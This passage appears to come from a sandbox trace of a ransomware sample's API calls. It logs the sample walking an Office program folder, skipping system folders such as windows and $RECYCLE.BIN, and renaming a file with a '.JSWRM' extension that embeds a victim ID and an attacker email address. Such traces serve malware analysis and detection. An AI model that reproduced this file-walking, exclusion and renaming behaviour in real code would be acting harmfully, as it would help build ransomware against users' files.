lpWideCharStr="9A8I36E") returned 8 [0143.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0143.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0143.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x24fd90 [0143.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0143.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0143.898] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\System.Windows.Controls.Theming.Toolkit.zip" (normalized: "c:\\program files\\microsoft office\\root\\office16\\system.windows.controls.theming.toolkit.zip"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\System.Windows.Controls.Theming.Toolkit.zip.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\system.windows.controls.theming.toolkit.zip.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24fd90 | out: hHeap=0x1e0000) returned 1 [0143.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0143.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0143.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0143.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.899] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x237626b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd088, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Tec.dll", cAlternateFileName="")) returned 1 [0143.899] lstrcmpiW (lpString1="Tec.dll", lpString2=".") returned 1 [0143.899] lstrcmpiW (lpString1="Tec.dll", lpString2="..") returned 1 [0143.899] lstrcmpiW (lpString1="Tec.dll", lpString2="...") returned 1 [0143.899] lstrcmpiW (lpString1="Tec.dll", lpString2="windows") returned -1 [0143.899] lstrcmpiW (lpString1="Tec.dll", lpString2="recovery") returned 1 [0143.899] lstrcmpiW (lpString1="Tec.dll", lpString2="perflogs") returned 1 [0143.899] lstrcmpiW (lpString1="Tec.dll", lpString2="documents and settings") returned 1 [0143.899] lstrcmpiW (lpString1="Tec.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.899] lstrcmpiW (lpString1="Tec.dll", lpString2="system volume information") returned 1 [0143.899] lstrcmpiW (lpString1="Tec.dll", lpString2="msocache") returned 1 [0143.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tec.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0143.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tec.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tec.dll", lpUsedDefaultChar=0x0) returned 7 [0143.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tec.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0143.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tec.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tec.dll", lpUsedDefaultChar=0x0) returned 7 [0143.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0143.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0143.900] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb99c21f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4c98, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="TecProxy.dll", cAlternateFileName="")) returned 1 [0143.900] lstrcmpiW (lpString1="TecProxy.dll", lpString2=".") returned 1 [0143.900] lstrcmpiW (lpString1="TecProxy.dll", lpString2="..") returned 1 [0143.900] lstrcmpiW (lpString1="TecProxy.dll", lpString2="...") returned 1 [0143.900] lstrcmpiW (lpString1="TecProxy.dll", lpString2="windows") returned -1 [0143.900] lstrcmpiW (lpString1="TecProxy.dll", lpString2="recovery") returned 1 [0143.900] lstrcmpiW (lpString1="TecProxy.dll", lpString2="perflogs") returned 1 [0143.900] lstrcmpiW (lpString1="TecProxy.dll", lpString2="documents and settings") returned 1 [0143.900] lstrcmpiW (lpString1="TecProxy.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.900] lstrcmpiW (lpString1="TecProxy.dll", lpString2="system volume information") returned 1 [0143.900] lstrcmpiW (lpString1="TecProxy.dll", lpString2="msocache") returned 1 [0143.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0143.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TecProxy.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TecProxy.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TecProxy.dll", lpUsedDefaultChar=0x0) returned 12 [0143.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0143.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0143.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TecProxy.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TecProxy.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TecProxy.dll", lpUsedDefaultChar=0x0) returned 12 [0143.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0143.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0143.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0143.900] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x237626b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x62068, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="TellMeRuntime.dll", cAlternateFileName="TELLME~1.DLL")) returned 1 [0143.900] lstrcmpiW (lpString1="TellMeRuntime.dll", lpString2=".") returned 1 [0143.900] lstrcmpiW (lpString1="TellMeRuntime.dll", lpString2="..") returned 1 [0143.900] lstrcmpiW (lpString1="TellMeRuntime.dll", lpString2="...") returned 1 [0143.900] lstrcmpiW (lpString1="TellMeRuntime.dll", lpString2="windows") returned -1 [0143.900] lstrcmpiW (lpString1="TellMeRuntime.dll", lpString2="recovery") returned 1 [0143.900] lstrcmpiW (lpString1="TellMeRuntime.dll", lpString2="perflogs") returned 1 [0143.900] lstrcmpiW (lpString1="TellMeRuntime.dll", lpString2="documents and settings") returned 1 [0143.900] lstrcmpiW (lpString1="TellMeRuntime.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.900] lstrcmpiW (lpString1="TellMeRuntime.dll", lpString2="system volume information") returned 1 [0143.900] lstrcmpiW (lpString1="TellMeRuntime.dll", lpString2="msocache") returned 1 [0143.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0143.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeRuntime.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0143.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeRuntime.dll", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeRuntime.dll", lpUsedDefaultChar=0x0) returned 17 [0143.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0143.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeRuntime.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0143.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeRuntime.dll", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeRuntime.dll", lpUsedDefaultChar=0x0) returned 17 [0143.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0143.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0143.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0143.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0143.901] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0063153, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x162d0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="TextConversionModule.dll", cAlternateFileName="TEXTCO~1.DLL")) returned 1 [0143.901] lstrcmpiW (lpString1="TextConversionModule.dll", lpString2=".") returned 1 [0143.901] lstrcmpiW (lpString1="TextConversionModule.dll", lpString2="..") returned 1 [0143.901] lstrcmpiW (lpString1="TextConversionModule.dll", lpString2="...") returned 1 [0143.901] lstrcmpiW (lpString1="TextConversionModule.dll", lpString2="windows") returned -1 [0143.901] lstrcmpiW (lpString1="TextConversionModule.dll", lpString2="recovery") returned 1 [0143.901] lstrcmpiW (lpString1="TextConversionModule.dll", lpString2="perflogs") returned 1 [0143.901] lstrcmpiW (lpString1="TextConversionModule.dll", lpString2="documents and settings") returned 1 [0143.901] lstrcmpiW (lpString1="TextConversionModule.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.901] lstrcmpiW (lpString1="TextConversionModule.dll", lpString2="system volume information") returned 1 [0143.901] lstrcmpiW (lpString1="TextConversionModule.dll", lpString2="msocache") returned 1 [0143.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d890 [0143.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TextConversionModule.dll", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0143.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0143.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TextConversionModule.dll", cchWideChar=24, lpMultiByteStr=0x2412b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextConversionModule.dll", lpUsedDefaultChar=0x0) returned 24 [0143.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d890 | out: hHeap=0x1e0000) returned 1 [0143.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0143.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TextConversionModule.dll", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0143.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0143.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TextConversionModule.dll", cchWideChar=24, lpMultiByteStr=0x240fc0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextConversionModule.dll", lpUsedDefaultChar=0x0) returned 24 [0143.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0143.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0143.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0143.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0143.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0143.902] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7f63b8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x7f63b8, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1349614, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1732c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="TIMESOLN.DLL", cAlternateFileName="")) returned 1 [0143.902] lstrcmpiW (lpString1="TIMESOLN.DLL", lpString2=".") returned 1 [0143.902] lstrcmpiW (lpString1="TIMESOLN.DLL", lpString2="..") returned 1 [0143.902] lstrcmpiW (lpString1="TIMESOLN.DLL", lpString2="...") returned 1 [0143.902] lstrcmpiW (lpString1="TIMESOLN.DLL", lpString2="windows") returned -1 [0143.902] lstrcmpiW (lpString1="TIMESOLN.DLL", lpString2="recovery") returned 1 [0143.902] lstrcmpiW (lpString1="TIMESOLN.DLL", lpString2="perflogs") returned 1 [0143.902] lstrcmpiW (lpString1="TIMESOLN.DLL", lpString2="documents and settings") returned 1 [0143.902] lstrcmpiW (lpString1="TIMESOLN.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.902] lstrcmpiW (lpString1="TIMESOLN.DLL", lpString2="system volume information") returned 1 [0143.902] lstrcmpiW (lpString1="TIMESOLN.DLL", lpString2="msocache") returned 1 [0143.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0143.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TIMESOLN.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TIMESOLN.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TIMESOLN.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0143.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0143.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TIMESOLN.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TIMESOLN.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TIMESOLN.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0143.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0143.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0143.902] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1729263, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1729263, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x18a6a8a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x32c60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="TLIMPT.EXE", cAlternateFileName="")) returned 1 [0143.902] lstrcmpiW (lpString1="TLIMPT.EXE", lpString2=".") returned 1 [0143.902] lstrcmpiW (lpString1="TLIMPT.EXE", lpString2="..") returned 1 [0143.902] lstrcmpiW (lpString1="TLIMPT.EXE", lpString2="...") returned 1 [0143.902] lstrcmpiW (lpString1="TLIMPT.EXE", lpString2="windows") returned -1 [0143.902] lstrcmpiW (lpString1="TLIMPT.EXE", lpString2="recovery") returned 1 [0143.902] lstrcmpiW (lpString1="TLIMPT.EXE", lpString2="perflogs") returned 1 [0143.902] lstrcmpiW (lpString1="TLIMPT.EXE", lpString2="documents and settings") returned 1 [0143.902] lstrcmpiW (lpString1="TLIMPT.EXE", lpString2="$RECYCLE.BIN") returned 1 [0143.902] lstrcmpiW (lpString1="TLIMPT.EXE", lpString2="system volume information") returned 1 [0143.903] lstrcmpiW (lpString1="TLIMPT.EXE", lpString2="msocache") returned 1 [0143.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0143.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TLIMPT.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TLIMPT.EXE", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TLIMPT.EXE", lpUsedDefaultChar=0x0) returned 10 [0143.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0143.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0143.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TLIMPT.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TLIMPT.EXE", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TLIMPT.EXE", lpUsedDefaultChar=0x0) returned 10 [0143.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0143.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0143.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0143.903] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca850099, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca850099, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb4fb945, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x21bab0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="tmpod.dll", cAlternateFileName="")) returned 1 [0143.903] lstrcmpiW (lpString1="tmpod.dll", lpString2=".") returned 1 [0143.903] lstrcmpiW (lpString1="tmpod.dll", lpString2="..") returned 1 [0143.903] lstrcmpiW (lpString1="tmpod.dll", lpString2="...") returned 1 [0143.903] lstrcmpiW (lpString1="tmpod.dll", lpString2="windows") returned -1 [0143.903] lstrcmpiW (lpString1="tmpod.dll", lpString2="recovery") returned 1 [0143.903] lstrcmpiW (lpString1="tmpod.dll", lpString2="perflogs") returned 1 [0143.903] lstrcmpiW (lpString1="tmpod.dll", lpString2="documents and settings") returned 1 [0143.903] lstrcmpiW (lpString1="tmpod.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.903] lstrcmpiW (lpString1="tmpod.dll", lpString2="system volume information") returned 1 [0143.903] lstrcmpiW (lpString1="tmpod.dll", lpString2="msocache") returned 1 [0143.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0143.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmpod.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmpod.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmpod.dll", lpUsedDefaultChar=0x0) returned 9 [0143.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0143.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmpod.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmpod.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmpod.dll", lpUsedDefaultChar=0x0) returned 9 [0143.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0143.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0143.903] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdc2b493, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcdc2b493, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe1564d75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x258fae8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Uc.dll", cAlternateFileName="")) returned 1 [0143.903] lstrcmpiW (lpString1="Uc.dll", lpString2=".") returned 1 [0143.903] lstrcmpiW (lpString1="Uc.dll", lpString2="..") returned 1 [0143.904] lstrcmpiW (lpString1="Uc.dll", lpString2="...") returned 1 [0143.904] lstrcmpiW (lpString1="Uc.dll", lpString2="windows") returned -1 [0143.904] lstrcmpiW (lpString1="Uc.dll", lpString2="recovery") returned 1 [0143.904] lstrcmpiW (lpString1="Uc.dll", lpString2="perflogs") returned 1 [0143.904] lstrcmpiW (lpString1="Uc.dll", lpString2="documents and settings") returned 1 [0143.904] lstrcmpiW (lpString1="Uc.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.904] lstrcmpiW (lpString1="Uc.dll", lpString2="system volume information") returned 1 [0143.904] lstrcmpiW (lpString1="Uc.dll", lpString2="msocache") returned 1 [0143.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Uc.dll", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0143.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Uc.dll", cchWideChar=6, lpMultiByteStr=0x345ef40, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Uc.dll", lpUsedDefaultChar=0x0) returned 6 [0143.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Uc.dll", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0143.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Uc.dll", cchWideChar=6, lpMultiByteStr=0x345ef10, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Uc.dll", lpUsedDefaultChar=0x0) returned 6 [0143.904] HeapFree (in: hHeap=0x1e0000, 